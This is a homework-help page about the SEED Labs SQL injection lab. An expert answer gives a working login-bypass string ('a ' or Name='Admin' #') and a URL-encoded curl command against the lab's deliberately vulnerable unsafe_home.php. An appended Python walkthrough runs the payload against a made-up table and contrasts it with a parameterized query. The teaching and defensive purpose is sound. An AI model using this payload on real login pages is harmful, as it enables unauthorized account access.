Question

In: Computer Science

Please explain how you got the answer thank you.

Task 2.1: SQL Injection Attack from webpage. Your task is to log into the web application as the administrator from the login page, so you can see the information of all the employees. We assume that you do know the administrator’s account name which is admin, but you do not know the ID or the password. You need to decide what to type in the Employee ID and Password fields to succeed in the attack.

Task 2.2: SQL Injection Attack from command line. Your task is to repeat Task 2.1, but you need to do it without using the webpage. You can use command line tools, such as curl, which can send HTTP requests. One thing that is worth mentioning is that if you want to include multiple parameters in HTTP requests, you need to put the URL and the parameters between a pair of single quotes; otherwise, the special characters used to separate parameters (such as &) will be interpreted by the shell program, changing the meaning of the command. The following example shows how to send an HTTP GET request to our web application, with two parameters (SUID and Password) attached:

curl 'www.SeedLabSQLInjection.com/index.php?SUID=10000&Password=111'

If you need to include special characters in the SUID and Password fields, you need to encode them properly, or they can change the meaning of your requests. If you want to include a single quote in those fields, you should use %27 instead; if you want to include white space, you should use %20. In this task, you do need to handle HTTP encoding while sending requests using curl.

Solutions

Expert Solution

Answer 2.1
**************

a ' or Name='Admin' #

If you look at the URL:

http://www.seedlabsqlinjection.com/unsafe_home.php?username=a+%27+or+Name%3D%27Admin%27+%23&Password=

where unsafe_home.php is the vulnerable page that we have to target for the next task, 2.2.

Answer 2.2
*************

Now just paste that URL into the curl command as shown below:

curl 'http://www.seedlabsqlinjection.com/unsafe_home.php?username=a+%27+or+Name%3D%27Admin%27+%23&Password=aass'

If you have any doubt then please ask me without any hesitation in the comment section below. If you like my answer then please give it a thumbs up. Before giving a thumbs down, please discuss the question; it may be possible that we understand the question in different ways, and I can edit and change the answers if you argue. Thanks :)
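As an added illustration (not part of the expert's answer), the Python below decodes the URL from the answer the way the web server does, then contrasts the concatenated query a vulnerable handler builds with a parameterized one against a small in-memory table. The table, column names and passwords are constructed stand-ins for the lab's database, and the stripping of everything after `#` emulates MySQL's line-comment handling, which SQLite does not have.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs

# The URL shown in the answer above (Task 2.2 curl argument).
URL = ("http://www.seedlabsqlinjection.com/unsafe_home.php"
       "?username=a+%27+or+Name%3D%27Admin%27+%23&Password=aass")


def make_db():
    """Constructed stand-in for the lab's credential table (names, passwords
    and salaries are invented). COLLATE NOCASE mirrors MySQL's default
    case-insensitive string comparison, so 'Admin' matches 'admin'."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE credential "
               "(Name TEXT COLLATE NOCASE, Password TEXT, Salary INTEGER)")
    db.executemany("INSERT INTO credential VALUES (?, ?, ?)",
                   [("admin", "pw-admin-constructed", 400000),
                    ("alice", "pw-alice-constructed", 20000)])
    return db


def decode_params(url):
    """What the server sees after URL decoding: '+' -> space, %27 -> quote,
    %3D -> '=', %23 -> '#'."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return q["username"][0], q["Password"][0]


def login_unsafe(db, name, pwd):
    """Classic vulnerable pattern: user input pasted into the SQL text.
    MySQL drops the rest of the line after '#', so the Password check is
    never evaluated; SQLite lacks '#' comments, so that is emulated here."""
    sql = (f"SELECT Name, Salary FROM credential "
           f"WHERE Name='{name}' AND Password='{pwd}'")
    sql = sql.split("#", 1)[0]          # emulate MySQL '#' line comment
    return db.execute(sql).fetchall()


def login_safe(db, name, pwd):
    """Parameterized query: the same input is bound as data, so the quote,
    OR and '#' characters are just part of a (non-matching) name string."""
    sql = "SELECT Name, Salary FROM credential WHERE Name=? AND Password=?"
    return db.execute(sql, (name, pwd)).fetchall()


if __name__ == "__main__":
    name, pwd = decode_params(URL)
    db = make_db()
    print("decoded username:", repr(name))
    print("unsafe handler  :", login_unsafe(db, name, pwd))
    print("safe handler    :", login_safe(db, name, pwd))
```

The unsafe handler returns the admin row without any password, while the parameterized handler returns nothing for the same input; the fix is to bind user input as parameters rather than to filter characters.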

